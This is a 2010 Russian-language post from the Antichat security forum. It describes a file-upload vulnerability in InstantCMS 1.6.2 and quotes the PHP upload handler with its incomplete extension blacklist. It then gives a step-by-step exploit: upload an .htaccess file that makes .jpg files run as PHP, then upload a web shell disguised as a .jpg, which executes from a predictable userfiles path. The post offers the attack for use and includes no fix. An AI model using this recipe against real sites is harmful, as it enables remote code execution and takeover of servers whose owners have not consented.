Форум АНТИЧАТ - Обзор уязвимостей InstantCMS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#33

05.06.2010, 21:24

The matrix

Reservists Of Antichat - Level 6

Регистрация: 09.07.2008

Сообщений: 102

Провел на форуме:
1744345

Репутация: 573

Отправить сообщение для The matrix с помощью ICQ

InstantCMS 1.6.2

File upload
Тащим свой зад на форму аплоада файлов

Код:

http://localhost/users/ваш id/addfile.html

componennts/users/frontend.php

PHP код:


		
			
foreach ($_FILES as $key => $data_array) {

                    $error = $data_array['error'];

                    if ($error == UPLOAD_ERR_OK) {

                        @mkdir(PATH.'/upload/userfiles/'.$id);

                    

                        $tmp_name   = $data_array["tmp_name"];

                        $name       = $data_array["name"];

                        $size       = $data_array["size"];

                        $size_mb    += round(($size/1024)/1024, 2);

                        

                        if ($size_mb <= $free_mb){

                            if(!strstr($name, '.php') && !strstr($name, '.asp') && !strstr($name, '.aspx') && !strstr($name, '.js') && !strstr($name, '.html') && !strstr($name, '.phtml')){

                                if (move_uploaded_file($tmp_name, PATH."/upload/userfiles/$id/$name")){

Заливаем сначала файл .htaccess содержимым

Код:

addhandler application/x-httpd-php jpg

затем shell с расширением jpg
Шелленг загрузится в
http://localhost/upload/userfiles/[ваш ид]/[имя шелла].jpg
и будет выполняться.

Последний раз редактировалось The matrix; 05.06.2010 в 21:27..